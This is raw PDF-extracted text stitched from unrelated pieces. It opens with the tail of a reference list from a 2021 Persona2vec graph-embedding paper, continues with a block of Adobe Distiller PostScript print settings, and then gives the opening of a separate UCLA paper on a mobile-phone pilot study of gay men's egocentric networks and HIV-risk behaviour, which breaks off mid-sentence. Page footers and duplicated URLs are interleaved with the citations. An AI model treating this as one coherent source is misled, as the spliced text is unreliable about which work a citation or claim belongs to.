In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP). Association for Computational Linguistics, 1025–1035. Cheng J, Wang Z, Wen J-R, Yan J, Chen Z. 2015. Contextual text understanding in distributional semantic space. In: Proceedings of the 24th ACM International on Conference on Information and Knowledge Management. ACM, 133–142. Coscia M, Rossetti G, Giannotti F, Pedreschi D. 2014. Uncovering hierarchical and overlapping communities with a local-first approach. ACM Transactions on Knowledge Discovery from Data 9(1):6:1–6:27 DOI 10.1145/2629511. Epasto A, Lattanzi S, Mirrokni V, Sebe IO, Taei A, Verma S. 2015. Ego-net community mining applied to friend suggestion. Proceedings of the VLDB Endowment 9(4):324–335 DOI 10.14778/2856318.2856327. Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 17/20 https://snap.stanford.edu/node2vec/ https://snap.stanford.edu/node2vec/ http://snap.stanford.edu/data/index.html https://github.com/jisungyoon/persona2vec http://dx.doi.org/10.1038/nature09182 http://dx.doi.org/10.1088/1742-5468/2008/10/P10008 http://dx.doi.org/10.1016/j.artint.2016.07.005 http://dx.doi.org/10.1145/2629511 http://dx.doi.org/10.14778/2856318.2856327 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Epasto A, Lattanzi S, Paes Leme R. 2017. Ego-splitting framework: From non-overlapping to overlapping clusters. In: Proceedings of the 23rd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’17. New York: ACM, 145–154. Epasto A, Perozzi B. 2019. Is a single embedding enough? Learning node representations that capture multiple social contexts. In: The World Wide Web Conference. New York: ACM, 394–404. Evans TS, Lambiotte R. 2009. Line graphs, link partitions, and overlapping communities. Physical Review E 80(1):016105 DOI 10.1103/PhysRevE.80.016105. Fortunato S. 2010. Community detection in graphs. Physics Reports 486(3–5):75–174 DOI 10.1016/j.physrep.2009.11.002. Gavin A-C, Aloy P, Grandi P, Krause R, Boesche M, Marzioch M, Rau C, Jensen LJ, Bastuck S, Dümpelfeld B, Edelmann A, Heurtier M-A, Hoffman V, Hoefert C, Klein K, Hudak M, Michon A-M, Schelder M, Schirle M, Remor M, Rudi T, Hooper S, Bauer A, Bouwmeester T, Casari G, Drewes G, Neubauer G, Rick JM, Kuster B, Bork P, Russell RB, Superti-Furga G. 2006. Proteome survey reveals modularity of the yeast cell machinery. Nature 440(7084):631–636 DOI 10.1038/nature04532. Grover A, Leskovec J. 2016. Node2vec: scalable feature learning for networks. In: Proceedings of the 22Nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’16. New York: ACM, 855–864. Iacobacci I, Pilehvar MT, Navigli R. 2015. Sensembed: learning sense embeddings for word and relational similarity. In: Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers). Stroudsburg: Association for Computational Linguistics, 95–105. Jauhar SK, Dyer C, Hovy E. 2015. Ontologically grounded multi-sense representation learning for semantic vector space models. In: Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies. Stroudsburg: Association for Computational Linguistics, 683–693. Leskovec J, Krevl A. 2014. SNAP datasets: Stanford large network dataset collection. Available at http://snap.stanford.edu/data. Leskovec J, Lang KJ, Dasgupta A, Mahoney MW. 2009. Community structure in large networks: natural cluster sizes and the absence of large well-defined clusters. Internet Mathematics 6(1):29–123 DOI 10.1080/15427951.2009.10129177. Leskovec J, Lang KJ, Mahoney M. 2010. Empirical comparison of algorithms for network community detection. In: Proceedings of the 19th International Conference on World Wide Web, WWW ’10. New York: ACM, 631–640. Li J, Jurafsky D. 2015. Do multi-sense embeddings improve natural language understanding? arXiv. Available at http://arxiv.org/abs/1506.01070. Liu N, Tan Q, Li Y, Yang H, Zhou J, Hu X. 2019. Is a single vector enough? exploring node polysemy for network embedding. In: Proceedings of the 25th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. New York: Association for Computing Machinery, 932–940. Liu P, Qiu X, Huang X. 2015. Learning context-sensitive word embeddings with neural tensor skip-gram model. In: Twenty-Fourth International Joint Conference on Artificial Intelligence. Palo Alto: AAAI Press. Liu Y, Liu Z, Chua T-S, Sun M. 2015. Topical word embeddings. In: Twenty-Ninth AAAI Conference on Artificial Intelligence, 25–30 January 2015, Austin Texas, USA. Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 18/20 http://dx.doi.org/10.1103/PhysRevE.80.016105 http://dx.doi.org/10.1016/j.physrep.2009.11.002 http://dx.doi.org/10.1038/nature04532 http://snap.stanford.edu/data http://dx.doi.org/10.1080/15427951.2009.10129177 http://arxiv.org/abs/1506.01070 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Maaten Lv d, Hinton G. 2008. Visualizing data using t-sne. Journal of Machine Learning Research 9(November):2579–2605. MacQueen J. 1967. Some methods for classification and analysis of multivariate observations. In: Proceedings of the Fifth Berkeley Symposium on Mathematical Statistics and Probability, Oakland, CA, USA. Vol. 1. 281–297. McInnes L, Healy J, Melville J. 2018. Umap: uniform manifold approximation and projection for dimension reduction. Available at https://arxiv.org/abs/1802.03426. Mikolov T, Chen K, Corrado G, Dean J. 2013a. Efficient estimation of word representations in vector space. Available at https://arxiv.org/abs/1301.3781. Mikolov T, Sutskever I, Chen K, Corrado GS, Dean J. 2013b. Distributed representations of words and phrases and their compositionality. In: Advances in Neural Information Processing Systems. 3111–3119. Morin F, Bengio Y. 2005. Hierarchical probabilistic neural network language model. In: Artificial Intelligence and Statistics (AISTATS’05). Vol. 5. 246–252. Neelakantan A, Shankar J, Passos A, McCallum A. 2015. Efficient non-parametric estimation of multiple embeddings per word in vector space. arXiv. Available at https://arxiv.org/abs/1504. 06654. Palla G, Derényi I, Farkas I, Vicsek T. 2005. Uncovering the overlapping community structure of complex networks in nature and society. Nature 435(7043):814–818 DOI 10.1038/nature03607. Pelevina M, Arefyev N, Biemann C, Panchenko A. 2017. Making sense of word embeddings. Available at https://arxiv.org/abs/1708.03390. Pennington J, Socher R, Manning C. 2014. Glove: global vectors for word representation. In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP). 1532–1543. Perozzi B, Al-Rfou R, Skiena S. 2014. Deepwalk: online learning of social representations. In: Proceedings of the 20th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’14. New York: ACM, 701–710. Raghavan UN, Albert R, Kumara S. 2007. Near linear time algorithm to detect community structures in large-scale networks. Physical Review E 76(3):036106 DOI 10.1103/PhysRevE.76.036106. Reisinger J, Mooney RJ. 2010. Multi-prototype vector-space models of word meaning. In: Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics. Association for Computational Linguistics, 109–117. Rossi RA, Ahmed NK. 2015. The network data repository with interactive graph analytics and visualization. In: AAAI. Rosvall M, Bergstrom CT. 2008. Maps of random walks on complex networks reveal community structure. Proceedings of the National Academy of Sciences of the United States of America 105(4):1118–1123 DOI 10.1073/pnas.0706851105. Rosvall M, Esquivel AV, Lancichinetti A, West JD, Lambiotte R. 2014. Memory in network flows and its effects on spreading dynamics and community detection. Nature Communications 5(1):4630 DOI 10.1038/ncomms5630. Rothe S, Schütze H. 2015. Autoextend: extending word embeddings to embeddings for synsets and lexemes. arXiv. Available at https://arxiv.org/abs/1507.01127. Sen P, Namata G, Bilgic M, Getoor L, Galligher B, Eliassi-Rad T. 2008. Collective classification in network data. AI Magazine 29(3):93 DOI 10.1609/aimag.v29i3.2157. Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 19/20 https://arxiv.org/abs/1802.03426 https://arxiv.org/abs/1301.3781 https://arxiv.org/abs/1504.06654 https://arxiv.org/abs/1504.06654 http://dx.doi.org/10.1038/nature03607 https://arxiv.org/abs/1708.03390 http://dx.doi.org/10.1103/PhysRevE.76.036106 http://dx.doi.org/10.1073/pnas.0706851105 http://dx.doi.org/10.1038/ncomms5630 https://arxiv.org/abs/1507.01127 http://dx.doi.org/10.1609/aimag.v29i3.2157 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Stark C, Breitkreutz B-J, Reguly T, Boucher L, Breitkreutz A, Tyers M. 2006. Biogrid: a general repository for interaction datasets. Nucleic Acids Research 34:D535–D539. Tang J, Qu M, Wang M, Zhang M, Yan J, Mei Q. 2015. Line: large-scale information network embedding. In: Proceedings of the 24th International Conference on World Wide Web, WWW ’15, Republic and Canton of Geneva, Switzerland, International World Wide Web Conferences Steering Committee. 1067–1077. Wang X, Cui P, Wang J, Pei J, Zhu W, Yang S. 2017. Community preserving network embedding. In: Thirty-First AAAI Conference on Artificial Intelligence. Wu Z, Giles CL. 2015. Sense-aaware semantic analysis: a multi-prototype word representation model using wikipedia. In: Twenty-Ninth AAAI Conference on Artificial Intelligence. Xie G-S, Liu L, Zhu F, Zhao F, Zhang Z, Yao Y, Qin J, Shao L. 2020. Region graph embedding network for zero-shot learning. In: European Conference on Computer Vision. Cham: Springer, 562–580. Yang L, Cao X, He D, Wang C, Wang X, Zhang W. 2016. Modularity based community detection with deep learning. In: IJCAI 16. New York: AAAI Press, 2252–2258. Zachary WW. 1977. An information flow model for conflict and fission in small groups. Journal of Anthropological Research 33(4):452–473 DOI 10.1086/jar.33.4.3629752. Zhang H, Zhong G. 2016. Improving short text classification by learning vector representations of both words and hidden topics. Knowledge-Based Systems 102(1):76–86 DOI 10.1016/j.knosys.2016.03.027. Zhang Z, Cui P, Wang X, Pei J, Yao X, Zhu W. 2018. Arbitrary-order proximity preserved network embedding. In: Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. New York: ACM, 2778–2786. Yoon et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.439 20/20 http://dx.doi.org/10.1086/jar.33.4.3629752 http://dx.doi.org/10.1016/j.knosys.2016.03.027 http://dx.doi.org/10.7717/peerj-cs.439 https://peerj.com/computer-science/ Persona2vec: a flexible multi-role representations learning framework for graphs Introduction Related work Proposed method: persona2vec Case study Numerical experiment Conclusions flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_zl6536xffjcdbhnnz257hqkpwu ---- UCLA UCLA Previously Published Works Title Mobile Phone Assessment in Egocentric Networks: A Pilot Study on Gay Men and Their Peers. Permalink https://escholarship.org/uc/item/4h67k7qv Journal Connections (Toronto, Ont.), 34(1-2) ISSN 0226-1766 Author Comulada, W Scott Publication Date 2014-12-01 DOI 10.17266/34.1.4 Peer reviewed eScholarship.org Powered by the California Digital Library University of California https://escholarship.org/uc/item/4h67k7qv https://escholarship.org http://www.cdlib.org/ Connections December | Issue 1&2 | Volume 34 | insna.org Mobile Phone Assessment in Egocentric Networks: A Pilot Study on Gay Men and Their Peers Abstract Mobile phone-based data collection encompasses the richness of social network research. Both individual- level and network-level measures can be recorded. For example, health-related behaviors can be reported via mobile assessment. Social interactions can be assessed by phone-log data. Yet the potential of mobile phone data collection has largely been untapped. This is especially true of egocentric studies in public health settings where mobile phones can enhance both data collection and intervention delivery, e.g. mobile users can video chat with counselors. This is due in part to privacy issues and other barriers that are more difficult to address outside of academic settings where most mobile research to date has taken place. In this article, we aim to inform a broader discussion on mobile research. In particular, benefits and challenges to mobile phone-based data collection are highlighted through our mobile phone-based pilot study that was conducted on egocentric networks of 12 gay men (n = 44 total participants). HIV-transmission and general health behaviors were reported through a mobile phone-based daily assessment that was administered through study participants’ own mobile phones. Phone log information was collected from gay men with Android phones. Benefits and challenges to mobile implementation are discussed, along with the application of multi-level models to the type of longitudinal egocentric data that we collected. Keywords: Gay men, HIV risk behaviors, mobile phone log, ecological momentary assessment, ohmage Authors W. Scott Comulada, is an assistant professor-in-residence in the Department of Psychiatry and Biobehavioral Sciences at the University of California, Los Angeles, California. He is also a Methods Core scientist for the Center for HIV Identification, Prevention, and Treatment Services (CHIPTS; P30MH058107) Acknowledgements This study was funded and supported by the National Institute of Mental Health (K01MH089270; P30MH058107). Mobile phone-based data collection was supported by ohmage and the following centers at the University of California, Los Angeles: the Center for Embedded Networked Sensing and Mobilize Labs. In particular, I would like to thank Deborah Estrin and Nithya Ramanathan for input on the development of the mobile assessment. Please send all correspendence to W. Scott Comulada, UCLA Center for Community Health, 10920 Wilshire Blvd, Suite 350, Los Angeles, CA 90024, USA. wcomulada@mednet.ucla.edu. W. Scott Comulada University of California Los Angeles, California Connections insna.org | Volume 34 | Issue 1 | December Mobile Phone Assessment in Egocentric Networks 1. Introduction Mobile phones are by nature social devices as highlighted by numerous studies on the structure of mobile communication networks (e.g., Onnela et al., 2007; Ye et al., 2008) and individual tie strengths (Zhang & Dantu, 2010). Most studies have analyzed sociometric data where large and bounded networks are observed. In contrast, egocentric networks of individuals, i.e. egos, and their peers, i.e. alters, have received less attention. In part, the focus on sociometric data may be due to the availability of “safe” data sets that are collected in laboratory settings, often on faculty and students where privacy issues are less critical and participants are technologically savvy. A good example is the MIT Reality Mining data set (Zhang & Dantu, 2010). Egocentric networks are often assessed in public health settings on marginalized populations, e.g. drug-using networks (Yang, Latkin, Muth, & Rudolph, 2013). Privacy is critical and “tech-savvy” assumptions may be unrealistic. Yet mobile assessment has been successfully carried out in cocaine-addicted homeless patients (Freedman et al., 2006) and other marginalized populations. Furthermore, mobile technologies can enhance data collection and intervention delivery in public health settings, e.g. ecological momentary interventions (Heron & Smyth, 2010). As we have found in our own transition from more traditional modes of data collection to mobile-based studies, an important part of the implementation process is a clear understanding of what mobile technologies can and cannot do. As noted by Lazer et al. (2009), researchers and institutional review boards (IRBs) alike need to be up to speed on the latest technologies in order to design and evaluate proper privacy and encryption protocols, respectively. In this article, we highlight the benefits and limitations of mobile data collection through egocentric data that was collected to test the implementation of a mobile phone-based health assessment in a sample of 12 gay men, i.e. egos, and their peers, i.e. alters. Both egos and alters used their own phones to fill out a health assessment and enter sensitive information on HIV-transmission behaviors. We collected phone-log data from a subset of the egos with Android phones in order to compare mobile communications with alters in the study and with individuals who did not enroll in the study. Therefore, our study provides a good opportunity to discuss privacy and ethical issues that are central to public health settings. We also give examples of research questions and analytic strategies that are afforded by the collection of mobile data in an egocentric study. A key feature of our data is the three levels of hierarchy. Egocentric data normally contains two levels where individuals (both egos and alters) are nested within egocentric networks. Multi- level models are applied and contain random effects for each network to allow mean levels of the outcome to differ across networks (e.g., Hall, 2010; Rice et al., 2009; Snijders, Spreen, & Zwaagstra, 1995; Valente, 2010). In our study, participants filled out an end-of-the-day mobile assessment over a month; repeated observations are nested within individuals. We discuss extensions to the basic multi-level model to analyze longitudinal egocentric data. It is important to note that longitudinal data in our study resulted from daily reporting which is a course version of ecological momentary assessment (EMA) where events are recorded as they occur in situ. EMA also involves a large number of repeated measurements and depends on careful timing, e.g. several times a day, to capture variations in behavior within days (See Shiffman, Stone, & Hufford, 2008, and Stone and Shiffman, 1994, for overviews). In contrast, standard assessment methods rely on retrospective recall where study participants are asked to report on behaviors over a period of time and are often interviewed in a clinical setting. EMA minimizes recall biases that are intensified as individuals reconstruct and retrieve events from their memory over longer periods of time. By self-administering assessments, EMA may also reduce interview bias, e.g. in giving socially desirable responses to sexual behavior questions (Kissinger et al., 1999). 2. Data and Methods 2.1 Participants Recruitment was conducted online (Figure 1). From April to August, 2013, 455 egos were recruited through pop- up messages on Grindr, a dating website for gay men, and postings on Craigslist that directed them to a study webpage. Craigslist is an online forum for classified ads. The study webpage directed egos to online screening and consent forms that were hosted by SurveyMonkey (http://www.surveymonkey.com/). Study eligibility required egos to 1) self-identify as a gay or bisexual man; 2) be at least 18 years old; 3) live in Los Angeles County; 4) use a web-enabled Android phone, version 2.3 or higher (issued after November 2010), or an iPhone; 5) use their mobile phone to participate in the study; and 6) recruit at least 3 alters who had an Android or iPhone they could use to participate in the study. Out of 455 egos who started the online forms, 19% were not eligible (n = 85) and 37% did not finish filling out the forms (n = 167). It is hard to know why Connections December | Issue 1 | Volume 34 | insna.org Mobile Phone Assessment in Egocentric Networks so many individuals did not finish filling out forms. In at least one instance, a peer started to fill out the forms on their mobile phone, lost internet connection, and did not attempt to re-initiate the forms. Eligible egos (45%; n = 203 of 455) were e-mailed to set up a one-time telephone interview and also received instructions on how to install and use the study mobile apps; calls were scheduled with 64 egos. During the call, we administered a demographic and social network assessment. Grindr banner ads were the primary recruitment source (n = 53 of 64 telephone interviews). After the telephone interview, egos were sent an e-mail template they could send to alters they wished to invite into the study. The e-mail template contained 